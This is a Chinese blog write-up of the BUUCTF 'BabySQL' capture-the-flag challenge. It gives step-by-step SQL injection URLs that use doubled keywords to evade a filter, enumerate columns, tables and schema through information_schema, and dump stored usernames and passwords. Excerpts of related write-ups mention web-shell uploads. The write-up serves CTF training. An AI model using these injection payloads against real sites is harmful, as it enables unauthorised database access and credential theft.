buuctf web [极客大挑战 2019]BabySQL

最新推荐文章于 2024-01-10 22:09:00 发布
最新推荐文章于 2024-01-10 22:09:00 发布
阅读量519 收藏
点赞数 1
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61903191/article/details/133169522
版权

又是你,还来?好好好

依旧老方法,先试探一手

有错误?

你有一个错误在你的SQL语法;检查与您的MariaDB服务器版本对应的手册,以便在第1行'1=1#'和password='1 "附近使用正确的语法

看来是or被过滤了,试试双写

双写可以绕过,这下就好办了,后面遇到同样被过滤的词,直接双写就🆗了

1、查看字段数

/check.php?username=1'oorrder bbyy 1%23&password=1'
/check.php?username=1'oorrder bbyy 2%23&password=1'
/check.php?username=1'oorrder bbyy 3%23&password=1'
/check.php?username=1'oorrder bbyy 4%23&password=1'

需要双写or和by

字段为1,2,3的时候页面显示为

字段为4报错

2、联合查询1,2,3字段

/check.php?username=1'ununionion seselectlect 1,2,3%23&password=1'

需要双写union和select

可以再页面上返回信息的是2,3字段

3、爆破当前的库、用户

/check.php?username=1'ununionion seselectlect 1,user(),database()%23&password=1'

需要双写union和select

4、爆破表

/check.php?username=1'ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()%23&password=1'

需要双写union、select、from、or、where

5、爆破b4bsql表

/check.php?username=1'ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'%23&password=1'

双写union、select、from、or、where、and

6、爆破表里的3个数据

/check.php?username=1'ununionion seselectlect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql%23&password=1

双写union、select、or、from

flag网页中显示并不完整,打开Shift+F12打开源码就能看到完整的flag

阿勉要睡觉(原神启动版)
关注
BUUCTF-Web】[极客挑战 2019]BabySQL
weixin_49298681的博客
01-05 285
1.根据提示知道sql注入有严格的过滤;再通过尝试找到绕过的方法为藏字符2.直接获得username和password 但是没有有用的信息3.通过order by的报错知晓有多少列:root =4.寻找回显点:root =>5.获得数据库基本信息:root =>6.通过information_schema数据库爆破table_name + column_names1.root =2.root =7.再根据知道的column_names去获取数据1.root =
[极客挑战 2019]BabySQL 1
qq_43618536的博客
07-02 432
BUUCTF的[极客挑战 2019]BabySQL 1
BUUCTF__web题解合集(三)
风过江南乱的博客
07-28 2514
1、[MRCTF2020]Ez_bypass 2、[GXYCTF2019]BabyUpload 3、[MRCTF2020]你传你????呢 4、[BJDCTF 2nd]假猪套天下第一 5、[极客挑战 2019]FinalSQL
buuctf[极客挑战 2019]BabySQL--联合注入、双写过滤
最新发布
weixin_61060664的博客
01-10 1752
有回显: The used SELECT statements have a different number of columns。有回显:版本为:“ 10.3.18-MariaDB!1' or'1'='1 失败。有回显,字段名为flag。
BUUCTF web BabySQL
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-18 95
进入靶场,老办法随便输入看一下。
BUUCTF Web [极客挑战 2019]BabySQL
网安小趴菜
08-31 458
BUUCTF Web [极客挑战 2019]BabySQL
BUUCTF-WEB
ccfly1012的博客
11-02 3910
目录 [HCTF 2018]WarmUp [极客挑战 2019]EasySQL 总结万能密码 [极客挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF web(二)
m0_46616663的博客
10-21 1425
[极客挑战 2019]Upload upload想到了文件上传漏洞,先传个一句话木马试试,php和图片马都不行 试一下phtml,phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 也不行,抓包改一下Content-Type 不让用<?,那就换一种 。。。。 再加个文件头 GIF89a OK了,猜测路径应该在/upload里面 蚁剑连上找到根目录下的flag [RoarCTF 2019]Easy Calc 源码发现 <?php error_reportin
BUUCTF_Web——[极客挑战 2019]BabySQL
Ho1aAs‘s Blog
03-16 309
既然是SQL注入,先测试是字符还是整型 ?username=admin&password=admin' # You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 报错,将井号编码,成功绕过 下一步,联合查询爆出注入点所在处 ?username=admin
BUUCTF WEB [极客挑战 2019]BabySQL
Y1da的博客
04-16 173
BUUCTF WEB [极客挑战 2019]BabySQL 进入环境后尝试万能密码登录失败,尝试常规sql注入 check.php?username=1&password=2' union select 1,2,3;# 回显 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use n
BUUCTF - web - BabySQL
1tachi的博客
11-04 283
文章目录判断注入类型判断字段数判断回显点查表查字段查数据 判断注入类型 尝试万能密码:'1 or 1=1 -- qwe 发现仅剩下1=1 -- qwe,可能ban掉了"or"关键词 尝试双写:1' oorr 1=1 -- qwe 登陆成功,可能以后都要双写了 判断字段数 1' oorrder bbyy 3 -- qwe 看来有三个字段 判断回显点 1' ununionion seselectlect 1,2,3 -- qwe 回显点是2和3 查表 1' ununionion seselectlect
BUUCTF WEB BabySql
qq_41696858的博客
09-03 325
题其实没什么,就是一个双写绕过waf的问题 按照常理,admin’ 123监测是否单引号闭合,直接给出注入点,且有回显 经过测试,waf过滤了or,by那么爆破列数的时候(直接输入order by 1会回显der 1): admin’ oorrder bbyy 1# 测试到4的时候会出现unknown_column,那么列数是3 -1’ ununionion selselectect 1,2,3# 下面爆破数据库,union select同样被过滤,同样双写 -1’ ununionion selselect
buuctf 极客挑战 babysql
SopRomeo的博客
01-17 1708
emmmmm这道题,常规注入不可行,很明显过滤了什么字符,我试了下双写,没想到可行。。 接着就直接上图吧 跟之前lovesql差不多
BUUCTF WEB Babysqli1
qq_41696858的博客
10-18 217
这题考的是sql注入 打开场景,一个登录界面 先尝试下,admin’,根据回显判断,用户名是admin没错,而且是单引号闭合 尝试万能密码,admin’ or ‘1’=‘1,发现是don’t hack me看来是有waf 但是尝试union这类词,发现他能过waf,那么尝试联合注入看看 首先要确定列数,不幸的是order触发了waf,需要大小写绕过 admin’ Order by 3#和admin’ Order by4#回显不一样,那么可以确认是三列 下面确定admin在那一列, a’ union sele
BUUCTFweb部分解题思路(PHP、Babysql、Upload、CheckIn)
weixin_44300286的博客
10-04 570
PHP 题目提示有备份文件,用扫描工具就能扫出来,得到源码 class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $us
BUUCTF [极客挑战 2019] BabySQL
Senimo
03-25 4030
BUUCTF [极客挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 极客挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
buuctf [GXYCTF2019]BabySQli
SopRomeo的博客
03-05 6066
常规sql注入都行不通,查看源码发现一个search.php, 先说说base32 和 base64 的区别, base32 只有大写字母和数字数字组成,或者后面有三个等号。 base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。 明显,那段文字是base32加密 解密后:c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW...
BUUCTF】 [极客挑战2019] BabySQL —— 清晰易懂总结好的 Writeup
algae
08-25 995
BUUCTF】 [极客挑战2019] BabySQL Writeup0x00 考点sql 注入 双写绕过0x01 解题爆库爆表爆列 0x00 考点 sql 注入 双写绕过 replace函数,找到union和select等替换为空 双写绕过,单词中间拆开,分两半,里面藏一个完整的: union ununionion select seselectlect from frfromom where whwhereere (过滤了or) information infoorrmation 常见UR
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿勉要睡觉(原神启动版)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值